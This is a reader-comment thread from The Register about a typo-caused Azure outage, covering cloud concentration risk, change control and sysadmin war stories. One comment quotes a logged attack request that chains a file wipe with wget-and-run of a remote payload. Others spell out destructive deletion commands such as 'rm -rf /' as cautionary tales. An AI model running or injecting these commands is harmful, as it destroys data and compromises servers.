back to article Microsoft’s Azure mishap betrays an industry blind to a big problem

“ELY (n.) – The first, tiniest inkling that something, somewhere has gone terribly wrong.” One the finest definitions from Douglas Adams and John Lloyd’s The Meaning of Liff, it describes perfectly the start of that nightmare scenario for ops in a big service provider - the rising tide of alerts after that update went live. …

  1. Korev Silver badge
    Mushroom

    I believe the over-reliance on a small set of cloud vendors is a massive threat to our way of life. If stuff goes down harder than what we've seen so far then a substantial part of the planets' infrastructure will just go down.

    Icon for a similar-size outage

    1. TaabuTheCat

      Oh yeah.

      We're just one human away from a spectacular outage. It's going to happen, the only question is when. Will anything change afterward to prevent it again? Likely depends on the severity of the pain to those with oversight and influence. Maybe then you'll get your simulator.

      1. steviebuk Silver badge

        Re: Oh yeah.

        No. Nothing will change. Someone higher up will make some bullshit up why it happened and why it won't happen again. People like us will warn time and time again that that is bollocks but constantly be ignored.

      2. Norman Nescio Silver badge
        Mushroom

        Re: Oh yeah.

        We certainly were one human away from a spectacular outage, but I realise you meant pretty much the opposite. Your phrase triggered the memory.

    2. Franco

      Been saying that for a while, pretty much every major player uses Cloudflare for example so when they go down half the internet's most popular sites go with it.

      1. Mike Pellatt

        Yeah, but at least with Cloudflare you get a detailed, published RCA that will:

        a) put hands up to what went wrong

        b) Tell The World the steps that have/will be taken to reduce the probability of a recurrence.

        Anyone seen that from Microsoft or AWS?

        1. Anonymous Coward
          Anonymous Coward

          They already do

          You mean like this? It was in a link in the other article linked in this one. I'm sure Amazon and Google publish similar post-mortems.

          https://status.dev.azure.com/_event/392143683/post-mortem

          1. Ahosewithnoname

            Re: They already do

            You're not going to get any thanks posting objective replies to anything Microsoft related around here

          2. Anonymous Coward
            Anonymous Coward

            We are all used to 365 as a baseline

            Some teams at Microsoft do a good job of explaining the root cause of a problem, while others just offer vague platitudes and move on.

            A prime example would be the teams working to maintain most of Microsoft 365, who tell us that an issue occurred and what they did to fix it, but that’s about it most of the time. They’ll never tell us why they made the change(s) which caused the issue in the first place, what us as customers stood to gain if applied successfully and what they’re doing to prevent a similar issue occurring in the future.

            For example, who at Microsoft is going to give a detailed explanation of how they broke the new public version of the 365 health center so badly that there’s a Twitter link on it -right now- which doesn’t actually go to Twitter but instead takes you to a mangled version of the health center itself? The URL looks like this: status.office365.com/%E2%80%8B//www.twitter.com/MSFT365Status

            Of course they’re not going to admit that the cause is writing a brand new publicly available health center with restricted info compared to what paying customers see on their 365 portal privately, because then they’d have to admit they have a team of people pointlessly duplicating work, just like their UX teams have been doing with their 365 admin panels for years now.

        2. Mike 125

          > but at least with Cloudflare you get a detailed, published RCA

          If planes keep crashing, is it enough to investigate and explain why?

          The big players can now give 80 pages of explanation.

          And do nothing.

          And get away with it.

          It must cost them realistic bucks, if this is going to change.

          1. Mike Pellatt

            I guess you missed point b) in my post.

      2. Palebushman

        Pretty much all that you have stated Franco is in their publicity video here. https://mediacenter.ibm.com/id/1_2j3k06qh

  2. Anonymous Coward
    Anonymous Coward

    “Making mistakes in a place that mercilessly demonstrates their consequences without them being consequential is the gold standard in safety nets. In aviation, those places are called flight simulators. In electronics, circuit simulators. In humans, Ibiza.”

    Beatiful - that's a poster :)

    1. My other car WAS an IAV Stryker
      Facepalm

      Ibiza?

      Being a 'Murican, not UK/Euro, I had to look this up. Seems like the parallel to saying "that's (Las) Vegas, baby," and the more popular "what happens in Vegas..."

      (If I misinterpreted the context, please gently correct me. You can still downvote, but that way you've earned the right to give one.)

      1. deadlockvictim

        Re: Ibiza?

        Ibiza is a right of passage for British, Irish & German youth.

        They fly over after school (US: high school)) has finished in June, dance, get pissed and come home with the most godawful tattoos.

        Is this anything like the famed Spring Break that one hears about?

        1. My other car WAS an IAV Stryker
          Pint

          Re: Ibiza?

          Yes, actually, very much like Spring Break throughout southern Florida and many resort towns of Mexico and some of the near Caribbean. Thanks for the clarification; here's one for you if you didn't get enough in Ibiza. --->

          (Not like I have first-hand experience; I was too much of a Band Geek traveling with the pep band to college basketball tournaments at that time of year. Still had plenty of drinking after our games, though, win or lose.)

      2. JBowler

        Re: Ibiza?

        Cabo

  3. Howard Sway Silver badge

    If a tiny typo brings down half of Brazil, perhaps we’re the nuts

    Quite a lot of people realised a long time ago that placing your faith in single points of failure is the real problem. If a single administrator's typo is all that stands between half the world's systems working or not then that is the mother of all single points of failure, and no other engineering principle will ever save you from that, because software engineering should strive to eliminate them as far as possible.

    It's stupid to try and run the world on a small handful of systems, that's the whole reason networking was found to be more resilient than centralisation. All that's happened is the big cloud providers have been selling the idea that the only thing networking is good for now is connecting to their new monolithic centralised systems, and whenever they go down it's shown to be a terrible step backwards for the internet.

    1. Robert Grant

      Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

      The systems aren't monoliths at all, but the configuration application is. And DNS, which is often the culprit for cloud outages.

      1. Anonymous Coward
        Anonymous Coward

        Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

        1st rule of outage: DNS. It is always DNS.

        Then you have just to find what did break the DNS...

        1. dirkjumpertz

          Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

          Abrupt outage -> BGP

          Gradual outage -> DNS

          1. ChoHag Silver badge
            Trollface

            Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

            Random outage -> DEV

        2. Bebu Silver badge

          Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

          《1st rule of outage: DNS. It is always DNS.》

          Surely DNS = does nothing special

          I suspect DNS in some obscure long dead language means 99% probability of being misconfigured with 100% chance of contingently working with just those misconfigurations - change anything ... disaster.

          A bit like Homer Simpson's boss - the perfect balance of terminal diseases or Queen Xanxia (Pirate Planet.)

        3. da39a3ee5e6b4b0d3255bfef95601890afd80709
          Facepalm

          Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

          If it's not DNS, it's the network. It's always the network.

          1. ChoHag Silver badge

            Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

            If it's not DNS because it's the network, it's because some network system is trying to look up a name in the DNS.

      2. JohnTill123

        Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

        Haiku:

        It’s not DNS

        There’s no way it’s DNS

        It was DNS

    2. ecofeco Silver badge

      Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

      Exactly. The whole goddamn point of the PC was to free us FROM centralized systems.

      Yet here we are, not just begging, but PAYING to be put back in chains.

      1. deadlockvictim

        Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

        Yes, and the whole point of Azure is to earn Microsoft shitloads of money.

    3. ChoHag Silver badge

      Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

      > "Don't put all your eggs in one basket" first appeared in the 17th-century

      > Quite a lot of people realised a long time ago

      Quite a long time ago.

      There is nothing new under the sun.

  4. Arthur the cat Silver badge

    rm -r *

    Decades ago a colleague who was new to Unix did exactly that in his home directory(*). He came to me and complained about it as he'd specifically read the man page and used the -i flag so it asked him whether to actually delete each file. Unfortunately he came from a VMS background where the flags come at the end, not the beginning. (Yes, he'd put the -r first, that was just rote learning.) Backups saved his day.

    (*) Even in those lax days we wouldn't have let him near root.

    1. longtimeReader

      Re: rm -r *

      I once - very deliberately - did "rm -rf /" on a box that was going to be reimaged anyway. It took a lot longer than I expected to start throwing up errors - so much so that I pushed the command into the background and tried running "ls" to see if it was actually working. Of course, by now it was missing libc (still loaded by the rm command but not visible elsewhere) and the resulting error showed that the deletions were happening. "echo *" still worked for a short time though.

      1. Arthur the cat Silver badge

        Re: rm -r *

        It took a lot longer than I expected

        BT,DT and yes it's a surprisingly long time.

        1. Kevin McMurtrie Silver badge

          Re: rm -r *

          It takes even longer if you're forgotten to unmount the shared network volumes.

      2. Anonymous Crowbar

        Re: rm -r *

        I actually did this on /usr on a running AIX [cant remember but it was either 5.3, 61. or 7.1] host. The OS stayed running and we were able to rebuild the whole system from there. [We had backups, but this was a test to see what we could do if we didnt have any backups].

        Was surprised by the fact the whole thing kept running.

        1. Return To Sender
          Alert

          Re: rm -r *

          Had a colleague do something similar whilst dialled in (yep, modems) to a customer system, RS/6000, probably AIX 4.3 or 5.1. Fortunately he 1) spotted the mistake/killed the command pretty quickly and 2) called for help immediately instead of trying to cover up. He lost a small amount of weight very rapidly too...

          Some judicious investigation ("for $deity's sake don't drop the line"), assistance from several of us and remote copying from customer's other AIX systems on their network followed by a 'fess up to customer and a reboot to make sure all was good and you've never seen anybody look so relieved. We took the piss for a while afterwards, you definitely don't do that whilst the poor bugger's looking terrified.

        2. Twilight

          Re: rm -r *

          AIX was a very weird Unix version but it did do some things very, very well.

      3. Doctor Syntax Silver badge

        Re: rm -r *

        "echo *" still worked for a short time though

        echo is a shell built-in. If yiu have a shell you should have echo.

        In my case it was mv rather than rm but when you can no longer reach mv it doesn't make too much difference. A live distro would have fixed it but this was back in SCO days so no live distros about.

      4. Norman Nescio Silver badge
        Coffee/keyboard

        Re: rm -r *

        I remember a very old story, which I can't find with a swift Internet search, about someone recovering a UNIX system after an accidental rm -rf from the root of the filesystem. The hapless person who had done this had stopped the process, but it had still chewed its way through a lot of /bin.

        An old pro had been able to log in to the stricken system via dial-up and have a poke around and work out what could be done with the commands that remained. It ended up with transferring some binaries obtained from another system across using something like xmodem or ymodem, which enabled enough functionality to do a full restore of the operating system. I think the damaged system lacked cp and mv, for example, but I guess still had sh. I don't remember the details, but it was a good read, including using commands in unexpected ways.

        It probably illustrated the need to have good backups, or something: but I was impressed by the technical wizardry used to recover from what appeared to be a fatally damaged system.

        No doubt someone with better memory than me will point it out in an El Reg comment or similar.

      5. Anonymous Coward
        Anonymous Coward

        Re: rm -r *

        So it is you... who keeps trying to break our webservers with commands embedded into the request URL?

        something like this

        "GET /shell?cd+/;rm+-rf+*;wget+ 10.0.0.1/jaws;sh+/jaws"

        (ip address changed to protect the ginormous hosting company that does nothing to stop hack attempts like this... Well, as they keep trying to suck all of our websites into their AI system, why would they)

      6. Cmdr Bugbear

        Re: rm -r *

        i wonder if the OS experienced a bright, white light before finally succumbing to oblivion?

    2. Rafael #872397
      Windows

      Re: rm -r *

      I want to play ITPTSD too!

      I was an intern in a university department that had the ONLY PC with a 10-Mb (go ask grampa) hard drive in the whole university. And it was used by some assistants to run Lotus 1-2-3 or similar (tell grampa I said "hi"). We used that computer at night to develop some very simple tools with Turbo Pascal (better not wake grampa again).

      One day we got to the office and there was a herd of office workers around the machine looking puzzled because "everything was missing". We discovered that one of them inserted a 5.25" floppy disk and typed "format c:". "Are you sure"? "Why, yes, I am sure".

      At the end of the day, the boss was talking to us about the importance of backups... lesson learned.

      1. Boy Quiet

        Re: rm -r *

        Grandad here! (First program 1969 prints banner of girlfriends name - now wife) - computer life lesson 1 don’t run important stuff on someone else’s machine, 2 keep your own backups. Old software runs for a surprisingly long time if kept in a silo. 1990’s accounts software still runs fine. Windows 7 off-line still good, Excel 2000 why not. A little ‘c’ programming (Borland anyone) to help out. You want the web ? Use you phone or iPad just leave my machines out of it :-)

  5. petef

    Many years ago a colleague ask me to clear my files to free up space on their workstation. I duly removed my /home but left an entry in /etc/passwd so that I could still login but with a home of root. After I'd informed the owner they blindly followed a remove user script, part of which was a question that asked are you sure you want to remove the user's home? A box full of floppies was needed to reimage.

    1. Ayemooth

      Why not just remove stuff INSIDE your home directory, then leave your $homedir as it was? It sounds to me like you changed more than necessary, and that's where the problem started.

      Unless you WANTED to create problems, in which case the BOFH offers you an onion bhaji!

      1. petef

        Guilty as charged. I have more experience under my belt now. I'll accept your bhaji, though.

  6. Anonymous Coward
    Anonymous Coward

    I think the article missed a bigger issue - that we are making our systems much more complicated than they need to be, MS in particular.

    Whenever (and you don't seem to have to wait long) Office 365362 goes down for some or all users, we find out that the whole ediface is built on a massive web of interconnected bits that (for example) punt your "should be simple" login authentication around multiple steps running on different computers all around the world. With my work hat on, on occasions I've noticed issues in our intranet and later seen that there was an MS issue "somewhere in the world" - that wouldn't be too surprising if we weren't the sort of government department that runs it's own data centres "for security".

    1. unimaginative
      Pint

      "I think the article missed a bigger issue - that we are making our systems much more complicated than they need to be, MS in particular."

      if only it was just MS, if only.

      There are lots of culprits:

      Web browsers which are now application platforms

      Cloud services which are complex enough you need to learn each one - they need to be flexible enough for all needs, so need to be very configurable, so complex. Just doing something like configuring permissions on AWS means learning the system

      Almost all OSes that provide a GUI.

      Systemd

      Even worse is that all the technology that is needed by a smaller number of big systems gets blindly copied by everyone else because it must be the right way to do it. People start worrying about scalability after the second user visits their website.

      Icon because I now need sone.

      1. hayzoos

        tip of the iceberg

        The copying or emulation of complex systems goes far and wide. non-exhaustive list: automobiles, "smart" products, IOT products, websites, "customer" "support", tax systems, non-smart electronically controlled devices, soft-touch on/off switches, healthcare systems.

        Some of the problem comes from intelligent people egotistically showing their cleverness. The less intelligent are the copiers of the complex.

        This is a far cry from the cleverness of simplicity. Instead of creating a Rube Goldberg contraption, create a system to produce a result with the least resource consumption. This concept used to be the gold standard. What happened?

        1. The Basis of everything is...

          Re: tip of the iceberg

          Progress....

        2. ecofeco Silver badge

          Re: tip of the iceberg

          What happened? Simplicity does not create profits. Unneeded complexity for market lock in and rent, does.

        3. Anonymous Coward
          Anonymous Coward

          Re: tip of the iceberg

          "This concept used to be the gold standard. What happened?"

          Profit. There's a lot more profit when you add 'features' which basically cost nothing and then rise the selling price 100% because it has 'features'.

          Then your competitor adds even more 'features' and the loop is ready. That's what happened.

  7. T G Warren
    Unhappy

    Obvious, so probably never going to happen.

    Can't fault the logic in this. Man years ago I was working on developing a "smart networK system that automatically re-configures itself in the even of a security breach, or (more usually) an interruption to service. Needless to say the first deployment was a catastrophe - if we'd had the tools available then that we have now, the whole process could have been smoothed out & many functional spec iterations could have been avoided along with a significant reduction in development & testing times & costs.

    *Sigh*

  8. andrey.abutin@gmail.com

    For what it's worth, most of the modern implementations of em will block a recursive delete on /. This is a much more likely error to occur in a script that does something like

    #rm -rf $APPCACHEDIR/*

    Or some other cleanup. As long as APPCACHEDIR is set to a directory, works great. But if a bug or a typo upstream don't set the variable to something, BOOM!

    Aside from borked updates, any nation not closely allied with the west would be insane to run any vital infrastructure on software located. Not when all of it could be simply turned off at the push of a button in case of any dispute.

    A simple test would be to ask a question whether everything would still work properly if all of Internet connections outside the borders were to be completely severed. If the answer is no, then dont run anything on it you can't afford to lose. Just like not putting money in a bank if you can't afford to lose it.

    1. An_Old_Dog Silver badge

      Learn the Frickkin' Shell!

      #rm -rf $APPCACHEDIR/*

      ... should never be used. Instead, code it in a failsafe way: #rm -rf ${APPCACHEDIR:-/dev/null}/*

      Or, code it to print an error: #rm -rf ${APPCACHEDIR:?"Attempting to remove APPCACHEDIR failed because APPCACHEDIR is null, and should not be."}/*

  9. Fabrizio
    Linux

    rm --recursive --force --no-preserve-root /

    Nowadays it's impossible to do a

    rm -rf /

    Instead you have to type the full:

    rm --recursive --force --no-preserve-root /

    So yes: try the former on a VM and don't try the latter!!!

  10. Boris the Cockroach Silver badge

    Emgineering 101

    If a typo is all that stands between you and the end of the world......... at least have systems to try and prevent said tpyo from ending the world.

    Take our aerospace stuff, now 'Jim' wants to change something in our programming , so we have a change sheet drawn up.

    Change:

    Reason for change:

    Who programmed said change:

    Who verified said change:

    Machining cell # :

    Who setup cell #:

    First article inspection:

    Routine inspection(date/time/who by)

    Its most likely that 'Jim' will appear several times, my name at least once, and whichever inspector is available.

    And this piece of paper will be filed away with the job sheets and the new proven program uploaded to our database under a new version number and the job routing card updated to show this.

    The reason why everything is long winded and in paper is so that we can prove the engineering change has had no effect of the final product leaving the loading bay. because its aerospace and we dont know if the part is part of a luggage bin or the bit that holds the engine to the wing.

    If your change to your DNS/database/server can cause the whole system to fall over then its as vital as our bits are to an aircraft, and you'll need a change sheet to not only log what you are doing, but get someone else to sign it off too.

    Ask yourself whatever happened to the first ever B-17 bomber.... it crashed because the pilots missed a step in configuring it.... hence all aircraft now have checklists to make sure the pilots setup the aircraft correctly

    1. Strahd Ivarius Silver badge
      Devil

      Re: Emgineering 101

      You are clearly an old fart who never went "agile"

      1. Anonymous Coward
        Anonymous Coward

        Re: You are clearly an old fart who never went "agile"

        You are clearly an old fart who never went Fragile

        TFFY

    2. The Basis of everything is...

      Re: Emgineering 101

      Surely the change must have had some effect on the final product, or why else you you be changing it?

      And for all checking and paperwork in the aviation industry it still has it's fair share of "oh $hit" moments where everyone has signed off on the paperwork with what turned out to be less than a full appreciation of exactly what they were signing off on.

      Having said that, the engineering discipline I learned back then has proven invaluable for many subsequent years of swearing at bits instead of pieces. While in many ways things are better than they've ever been, we've still got a lot to more to [re]learn.

      (I'll raise a cocktail to the memory of the Mods and Docs office. It might be Finnish inspired though...)

      1. Boris the Cockroach Silver badge
        Boffin

        Re: Emgineering 101

        The change maybe a simple "we cant buy tool 101, so heres 1 from a different supplier that needs to be run faster/slower"

        This means changing the programming

        This means that as its a change, it has to be approved as having no effect on the final product.

        This is the approach to running a reliable system whether its what I do, or as a software dev, or in the operations room when swapping servers because a HDD is dying. make sure what you do has no impact on your customer, because nothing is worse than having that phone call from said customer when you've f'ed up.

        Oh and agile is shit and we all know it, move fast and break stuff is fine when its designing/programming stuff... move it out to the real world and you end up with banks unable to tranfer money, heavy lumps of metal fired out of machines at 100 mph(my nightmare) or aircraft that go up and down for a bit before proving the old adage of every plane can land at least once.

        1. uccsoundman

          Re: Emgineering 101

          > Oh and agile is shit and we all know it,

          Yes, but it's CHEAPER. Not only do you no longer need to do testing, but when the product fails, the contract temps that wrote it are LONG gone to another project at another company. The CIO only needs to point to the cost savings and no further questions will be asked. The shareholders only look at that cost and never at the cost of the failure (so sad, too bad). If you are a customer that lost money, oh well, that's life in the big city. Complain to the regulators? LOL, they are in the Bahamas partying with the CIO.

      2. Norman Nescio Silver badge

        Re: Emgineering 101

        And for all checking and paperwork in the aviation industry it still has it's fair share of "oh $hit" moments where everyone has signed off on the paperwork with what turned out to be less than a full appreciation of exactly what they were signing off on.

        Somebody signed off on MCAS.

        The reasons it was signed-off are still under investigation, but it could turn out to be a company-killing sign-off, even if it were for what seemed like unimpeachable reasons at the time. Hindsight can be a wonderful thing.

  11. Anonymous Coward
    Anonymous Coward

    Software Defined ... Stuff

    I dislike the term. It's not really software-defined stuff, it's "config files and some scripts".

    But the ops people (whom I have great respect for) aren't used to the "software" world where things will go tits the first time you run them. And then the first time you run them on a machine that isn't the developer's machine. And then the first time you show it to a client. And then the first time you run them on the client's infra and not yours.

    So, yeah, it would be great to have a simulator of the infra to test the impact of changes. That will cost money though and it will also be very hard to produce. Because, by definition, the things that go wrong aren't the things which we anticipated would go wrong.

    It's very easy to configure cloud stuff. Therefore it's very easy to misconfigure it. And that goes treble for the people who are managing the cloud. Quis custodiet ipsos custodes?

  12. Smirnov

    Industry wide phenomenon

    >> But these excrescences are corporate and cultural: the typo-induced Azure outage is an industry wide phenomenon that good people perpetrate. Simple typos and their cousin, Mr Misconfiguration, can unleash chaos to anyone.

    And yet it is predominantly Azure which suffers from a high amount of self-inflicted outages, while most of its competitors seem to do a lot better on that front. .

    And this is already on top to Azure's tendency to also fail for a number of other reasons, simply because Microsoft's shitty software stack is built from old toilet roll cores and bubble gum on a platform of quicksand.

    So I have to disagree with the author, it's not a industry wide phenomenon, it's pretty much a Microsoft-specific problem.

    1. hayzoos

      Re: Industry wide phenomenon

      I think your assessment is somewhat accurate. But, a lot of this also comes from lack of experience. The trend is to dump the experienced and hire the fresh out of university or tech school lower cost bright youngun's. So I think it is an industry wide problem. Azure is the canary in the mine though.

      1. Smirnov

        Re: Industry wide phenomenon

        >> I think your assessment is somewhat accurate. But, a lot of this also comes from lack of experience.

        Azure and GCP both launched in 2008, that's 15 years ago. And AWS is even older. After one and a half decade I'm not sure lack of experience is a good explanation.

        >> The trend is to dump the experienced and hire the fresh out of university or tech school lower cost bright youngun's. So I think it is an industry wide problem. Azure is the canary in the mine though.

        GCP is full of experienced cloud engineers, and so are AWS and Azure. I'm sure they have their fair share of people fresh from university but they most certainly don't maintain their infrastructure.

        Instead of staff, it's much more likely that Microsoft's problems are simply rooted in the fact that it's cloud infrastructure has grown out of its legacy software stack (Windows and Hyper-V), and while Azure today is a lot more than that (most of it is Linux, actually) the traces of this past can be found everywhere, carrying with it the same problems. In addition, Azure reflects a lot how standalone Microsoft software has been designed. So it's not really surprising that a simple user error can bring down large parts of Azure.

        Neither Amazon nor Google were carrying the same legacy baggage. Which, clearly, has resulted in a lot more robust cloud platforms than Azure.

        As I said, I don't believe it's an industry problem, because no-one else in the industry suffers from the same issues as Microsoft.

        1. Kristian Walsh Silver badge

          Re: Industry wide phenomenon

          I get that you don’t like Microsoft, but don’t let that blind you into believing that these problems are “because Microsoft”; they’re not. We used AWS at a previous job. Lots of outages, big and small. Remember December 2021, when AWS died three times in a month? Okay, one of those was a DC fire, but the other two? A very vague statement from AWS danced around the fact that the cause was a misconfiguration that directed huge volumes of network traffic down a link that couldn’t accommodate and it caused a cascade failure across US West.

          If Google had anything like a comparable market share to Microsoft and Amazon, you’d see the same problems from them more often too - as it is, their own services have frequent hours-long outages, but they’re non-essential so nobody cares. (We rejected Google as a cloud provider after looking into the outage rate of Google’s own hosted services...)

          The DevOps model gives great agility, but it also leads companies into a dangerous belief: that because each change made to the system is small, their effects are also small, and easily reversed.

  13. Stolen Time

    ^-r^-rf

    Is there a proofreading error in the article? Several other comments have used "rm -rf" instead of "rm -r", and I remember I got used to typing -rf without really thinking about it... if a mistake is worrth making, it's worth making properly.

    1. Kristian Walsh Silver badge

      Re: ^-r^-rf

      -f has another meaning, though: “delete this if it exists, but don’t bug me if it’s already gone” - the “vanilla” rm will bitch if you try to delete something that is not there to be deleted (“Open the door!” “I can’t!” “Why?” ”The door is already open!”). For that behaviour, I pretty much always have to use -rf when cleaning up directories.

    2. ChoHag Silver badge

      Re: ^-r^-rf

      There were debates in Reg House about how to spell this command in the article. In the end, the safety people won.

      Somebody *will* eat some copy pasta.

  14. notyetanotherid

    Personification

    > Simple typos and their cousin, Mr Misconfiguration, ...

    Miss Configuration, surely?

    1. TimMaher Silver badge
      Happy

      Re: Miss Configuration

      Ms Configuration surely?

      Then you can say that it was “mis-configured”.

  15. mpi Silver badge

    > If a tiny typo brings down half of Brazil, perhaps we’re the nuts

    Well, at some point somewhere the important stuff has to be configured.

    It doesn't matter how the system is designed, there will always be a few core configs that matter so much that getting them wrong will bring down the entire structure. Software isn't like structural engineering where points of failure can be spread out, because software deals with information, not forces. If the info is wrong, it is wrong everywhere all at once.

  16. Joseba4242

    "Nobody who has seen this happen ever forgets - or repeats - it. "

    Especially fun when this happens in a script that's auto-run on every single Mac in the company.

  17. Flywheel
    Facepalm

    rm -r *

    Do it in style: rm -rfv *

  18. martinusher Silver badge

    Its really computing hubris

    I come from the real time world where bugs in your code can have interesting, physical, consequences. This teaches you to be cautious about what you do and how you do it and is a very different mindset to the one exhibited by my applications programming colleagues. Their projects are often late and in "Phase 1" levels of implementation and they're always hankering after "the latest" because this OS/language/tool will rapidly make up any shortfall in timescale, performance, budget or what-have-you. Its not the fault of any particular individual (mostly) but rather its institutionalized, there's an expectation about delivery and performance being perennially short and the whole mess is exacerbated by development techniques that focus on frequent specification changes, builds and releases. (Or what I tend to think of as "Hose it against that barn wall and see what sticks".) Naturally people like myself are treated as "not really a programmer" (I've had that actually said to my face...) because I'm always working with less than state of the art tools and I and my colleagues tend to adopt a more plodding approach to design and implementation with a big emphasis on testability (with a side of provability).

    I think the problem is cultural. I've lived with it in one form or another for practically 50 years and the mindset has always been around in one form or another. It really started with minicomputers and the rise of the DiY programmer -- the old mainframes were too big, slow and expensive for people to waste time in suck it and see mode, they'd design the code and test it on the spare (most enterprises had dual systems for redundancy so you'd use use the standby for code development and testing). This rather slow approach wasn't foolproof but it generally limited the scope of damage a simple error could cause.

    (....and yes, guess which newbe did a "rm -rf *.lst" as root but accidentally put a space between the * and the '.lst''.......its the mistake you'll only ever make once.....)(the 'f' not only slowed down the process somewhat but indicated that "a major screwup" was taking place, limiting the damage somewhat)

    1. Anonymous Coward
      Anonymous Coward

      Re: Its really computing hubris

      "you'd use use the standby for code development and testing"

      Ah yes. Except when someone in manglement decided a change was too small to justify bringing up the spare mainframe and ordered it put live without testing. After protesting and being overruled, I was at least stubborn enough to get the order in writing.

      Turned out that some long-gone utter toe-rag had written a quick and dirty undocumented fix yonks ago that didn't bother with the site-standard memory overlay, but just direct-addressed a chunk of memory up the far end of a memory block "because they'll never use that bit", overwriting my carefully crafted print output with unprintable gibberish which caused every transaction on the entire high-throughput system to crash (because the change, to add two digits for pence to a single field was in a print generated by every task).

      Brought an entire country's trade to a standstill for several hours followed by three days of manual fallback with paper forms while they retrieved the data from the crashed transactions.

      I was very glad I had that signed piece of paper.

  19. jlturriff

    "Just run the test scripts." ―easy to say, but

    On a large system like Azure, it's almost impossible to cover all of the possible combinations of interactions and customer practices. Does a customer run multiple servers that talk to one another? How many different ways are there to back up your databases? Do the servers interact with non-Azure servers? etc.

    One would think that MS' test suite would include a realistic working set of databases (perhaps a clone of a production set, including some archival backups) that can be loaded from a known state, but it sounds like they don't.

  20. CowHorseFrog Silver badge

    Yet another article on this very story and AGAIN they dont actually point out what the typo or actual error was.

    May the gods have mercy on us...

    1. Anonymous Coward
      Anonymous Coward

      ".... they dont actually point out what the typo or actual error was."

      MS doesn't tell and for others it's quite difficult.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like